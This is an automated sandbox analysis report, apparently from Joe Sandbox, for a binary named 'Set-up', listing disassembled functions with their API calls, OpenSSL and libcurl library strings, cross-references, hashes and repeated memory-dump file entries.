formdata.c, xrefs: 0002481F, 00024C8D, 00024DEB, 00024F36, 00024FF3, 00025081, 000250AB, 000250E6, 00025116, 00025161, 0002518B, 000251C6, 000251F6
application/octet-stream, xrefs: 00024DE3

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: application/octet-stream$formdata.c
API String ID: 0-1216067158
Opcode ID: 81d65d3e8c37e3479e0a9830e4133c418ca83f7fed504e9d3522d954940085af
Instruction ID: c1b457d85314e1963263f1b71d8a0121f343d72edcbfe58f8bf6b89e3e036db5
Opcode Fuzzy Hash: 81d65d3e8c37e3479e0a9830e4133c418ca83f7fed504e9d3522d954940085af
Instruction Fuzzy Hash: 5302E5B0A08B608BE774CF14ED8172ABBD1BF94304F59492DD88A4B792E771E885CB45

Function 002C46B0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 324stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 002C46DD

Strings

ASN1_mbstring_ncopy, xrefs: 002C4797, 002C47BC, 002C47E1, 002C4806, 002C4845, 002C4884, 002C492C, 002C49DE, 002C4A35
crypto/asn1/a_mbstr.c, xrefs: 002C479E, 002C47C3, 002C47E8, 002C480D, 002C484C, 002C488B, 002C4933, 002C4A3F, 002C4A9D
minsize=%ld, xrefs: 002C485A
maxsize=%ld, xrefs: 002C4899

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen
String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
API String ID: 39653677-2338284442
Opcode ID: ed5f58eb06afff2c4a0ef389b70f92e20c6a8b93edd94758c15ea5c2be581ab0
Instruction ID: f93853c708f15562f6760b8cc1d3c43d0ae015bfe123bae4141d9c7d6ba28cc8
Opcode Fuzzy Hash: ed5f58eb06afff2c4a0ef389b70f92e20c6a8b93edd94758c15ea5c2be581ab0
Instruction Fuzzy Hash: 4BA1F771B687026BE720BE149C72F2B7391AB90704F14472DFD465B3C6E7B1D8248696

Function 00212530 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 306COMMON

Download Yara Rule

Strings

.%lu, xrefs: 00212761
crypto/objects/obj_dat.c, xrefs: 00212810

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: .%lu$crypto/objects/obj_dat.c
API String ID: 0-3322715555
Opcode ID: 108912cfa50bdc4513b18b08d9829f616ed0d0ceee59db08c85cab1dc316db50
Instruction ID: 5f51a7c304ad7dd10b1fa739dfcb0c36b4b88e43430a45cfc42332583a297f65
Opcode Fuzzy Hash: 108912cfa50bdc4513b18b08d9829f616ed0d0ceee59db08c85cab1dc316db50
Instruction Fuzzy Hash: AAA1F871A24302EBD7149E1589907ABB7E6AFF0704F15842CF88897281E770DCBDD792

Function 00050080 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 301stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00050090

Part of subcall function 0010F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,000500B0,?,?,00000000,00000000,?), ref: 0010F35D

Strings

$, xrefs: 00054D75
Bad file size (%lld), xrefs: 00054CFF
File already completely downloaded, xrefs: 00054239
Offset (%lld) was beyond file size (%lld), xrefs: 00054CF5, 00054D0E, 00054D64

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: $$Bad file size (%lld)$File already completely downloaded$Offset (%lld) was beyond file size (%lld)
API String ID: 3014104814-979756411
Opcode ID: 17f2d7ffc05b22de5b21f7ed85a4aee7f5e4b7896c9e5904a5f1dbafa6dffd50
Instruction ID: f50456e7cf00c74f1e70069d898441d5738a2c237bf6c99b2c2a32c59d4db80c
Opcode Fuzzy Hash: 17f2d7ffc05b22de5b21f7ed85a4aee7f5e4b7896c9e5904a5f1dbafa6dffd50
Instruction Fuzzy Hash: 1EB10671B043009FD755DF28C880AABBBE5AFC9314F14462DFD98973A2D770AD488B62

Function 0003E300 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 283COMMON

Download Yara Rule

Strings

User-Agent: %s, xrefs: 0003E60C
No URL set, xrefs: 0003E393
cannot mix POSTFIELDS with RESUME_FROM, xrefs: 0003E3C1
transfer.c, xrefs: 0003E331, 0003E364, 0003E479, 0003E59A, 0003E5E4, 0003E70D, 0003E729

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID:
String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
API String ID: 0-950935550
Opcode ID: b050ff643fac76abb1fa5c7479a56aafb09efbfba6ffa3f18954129265353091
Instruction ID: 9757ef4293229fbf08825df9d4ee58f1a683d9db6148447215cf4f9adf87abbc
Opcode Fuzzy Hash: b050ff643fac76abb1fa5c7479a56aafb09efbfba6ffa3f18954129265353091
Instruction Fuzzy Hash: 63B1F4B1B00E42ABE76A9B74DC46BE6F798BF55315F040339E42C92282E7717524CBD2

Function 0017A210 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0017A37F

Strings

ossl_quic_channel_raise_protocol_error_loc, xrefs: 0017A2D9, 0017A3B0
QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 0017A3D5
ssl/quic/quic_channel.c, xrefs: 0017A2E3, 0017A3BA
QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 0017A310

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen
String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
API String ID: 39653677-1084217658
Opcode ID: a9d3e20453abefdee486c59c839666449cbca1a12ce48df76340db48da753b3f
Instruction ID: bd9c8b69440b9f6ccf5bf4642567237d788c1b6c37de2b0e2703a09a55c1c400
Opcode Fuzzy Hash: a9d3e20453abefdee486c59c839666449cbca1a12ce48df76340db48da753b3f
Instruction Fuzzy Hash: F45191B1A04349ABCF00DF64DC42A9B7BE5FF98354F444529FE4C97241E735D9148BA2

Function 003A6250 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,000F0E3B,?,?,00000000,?), ref: 003A63E9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,000F0E3B,?,?,00000000,?), ref: 003A63FB

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 4a4fab48c011511840bcebb10c291fdb8d758a0aa1e7550c0d2da400f0d7635a
Instruction ID: 7238eb9b4c21fea5d8cb29b4afa2040b6beb68b0e806fd72f0ee7b0f935eee40
Opcode Fuzzy Hash: 4a4fab48c011511840bcebb10c291fdb8d758a0aa1e7550c0d2da400f0d7635a
Instruction Fuzzy Hash: B841F675A043019FDB059F699882B2F77E8EF96314F1E483CF84AC72A2E634DC058792

Function 001D67F0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 117stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001D691C

Strings

lib(%lu), xrefs: 001D689A
error:%08lX:%s:%s:%s, xrefs: 001D68FE
err:%lx:%lx:%lx:%lx, xrefs: 001D6933
reason(%lu), xrefs: 001D68E1

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen
String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
API String ID: 39653677-804487489
Opcode ID: 9cc7537d2cf9eb7b39fb02e91c6e1bb26aee2ae7469a23b4690e157d1fa500c2
Instruction ID: cbc272c75d21798e67132c22b53c22a7b9d368e6beb0e9a0b64331c50e8e25db
Opcode Fuzzy Hash: 9cc7537d2cf9eb7b39fb02e91c6e1bb26aee2ae7469a23b4690e157d1fa500c2
Instruction Fuzzy Hash: 673108B2A40304BBF7216A559C46BAB76DD9BA5318F040039FE4C923D3F771AD24D6A2

Function 0036A340 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 106stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0036ABB9), ref: 0036A34E

Part of subcall function 001FE270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 001FE28D

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,0036ABB9), ref: 0036A446

Strings

.cnf, xrefs: 0036A38E
crypto/conf/conf_def.c, xrefs: 0036A3B9, 0036A410
.conf, xrefs: 0036A376

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strlen$_errno
String ID: .cnf$.conf$crypto/conf/conf_def.c
API String ID: 3066963124-3060939390
Opcode ID: 1c10656cc71c6b31afbf131e2ab7ce25823a2bef7ba3109c542095d0761d361e
Instruction ID: f818ecd8fd15f7ddc665d81f01df7420e1bb880fe28caef3d6d8489fe5a2b06a
Opcode Fuzzy Hash: 1c10656cc71c6b31afbf131e2ab7ce25823a2bef7ba3109c542095d0761d361e
Instruction Fuzzy Hash: CC2139E5D0460577DB127731AC43E2B36DC8F62344F058838F909A6396FB65DD1485A3

Function 001B0870 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,001FF556,00000000,FFFFFFFF,00000000,?,00000000,002006DF,?), ref: 001B08D7
memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,0017973B), ref: 001B0977

Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8

Strings

BUF_MEM_grow, xrefs: 001B089A
crypto/buffer/buffer.c, xrefs: 001B08A1, 001B08FC, 001B0911, 001B0946

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: memsetstrcpystrlen
String ID: BUF_MEM_grow$crypto/buffer/buffer.c
API String ID: 1298912638-2735992530
Opcode ID: eb9702d07c5bc023b68b360a993b7fd797329973c8b7f5f11807702bb02b1208
Instruction ID: 48fdfb96b6ab30fc04744c78501c341abedd551673134200ff50c2c07914f787
Opcode Fuzzy Hash: eb9702d07c5bc023b68b360a993b7fd797329973c8b7f5f11807702bb02b1208
Instruction Fuzzy Hash: 81316CB1E403117BE325AA209C02F6BB39DEB5875CF058124F91D973C3E361AD1087D1

Function 00202010 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00202704,00000008), ref: 0020204D

Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00202704,00000008), ref: 002020C3

Strings

copy_integer, xrefs: 002020DA
general_set_int, xrefs: 00202086
crypto/params.c, xrefs: 00202090, 002020E4

Memory Dump Source

Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true

Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcpymemset
String ID: copy_integer$crypto/params.c$general_set_int
API String ID: 2323844366-2562949257
Opcode ID: 72a99a4fc14c5d7ba73f52f348030ce5c8ac66c3f0778ae0f57824b2d48fe287
Instruction ID: 7e2d25602715d373b118e7c6efcf709278a7dd132fa4a6733ad3152079e33aba
Opcode Fuzzy Hash: 72a99a4fc14c5d7ba73f52f348030ce5c8ac66c3f0778ae0f57824b2d48fe287
Instruction Fuzzy Hash: AE212D70A18301EBD3306A24AC8AF777796DBA5704F14017BF908973C3E6A2AC69C261

Function 00202140 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,0020299E,00000008), ref: 002021A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,0020299E,00000008), ref: 002021FE

Part of subcall function 002040A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00202075,?,?,?,?,?,?,00202704,00000008), ref: 002040C1
Part of subcall function 002040A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00202075,?,?,?,?,?,?,00202704,00000008), ref: 0020411E

Strings

copy_integer, xrefs: 00202214
general_get_uint, xrefs: 00202176, 002021BA
crypto/params.c, xrefs: 00202180, 002021C4, 0020221E

Memory Dump Source

